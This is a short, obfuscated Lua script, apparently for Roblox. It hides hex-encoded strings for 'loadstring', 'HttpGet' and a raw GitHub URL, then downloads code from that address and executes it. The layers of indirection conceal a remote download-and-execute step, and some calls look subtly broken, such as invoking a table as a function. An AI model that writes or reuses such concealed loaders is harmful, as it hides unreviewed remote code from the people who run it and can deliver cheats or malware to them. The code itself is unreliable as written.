local _={} 
_._1="6765746F626A656374" 
_._2="68747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F66656E67343038382F726F626C6F782D66656E672F6D61696E2F" 
_._3="6C6F6164737472696E67" 
function _._4(...) 
    return (_._5)(...); 
end 
_._6=function(...) 
    return string.char(...); 
end 
_._7=function(...) 
    return game[_(...)]; 
end 
_._5=function(...) 
    return loadstring(...); 
end 
_._8=function(...) 
    return _._6(0x48, 0x74, 0x74, 0x70, 0x47, 0x65, 0x74); 
end 
_._9=function(...) 
    return _._7(_._1); 
end 
_._10=function(...) 
    return _._9()(_._2:gsub('%x%x', function(s) return _._6(tonumber(s, 16)) end)); 
end 
_._11=function(...) 
    return _._4(_._10())(); 
end 
_._11();
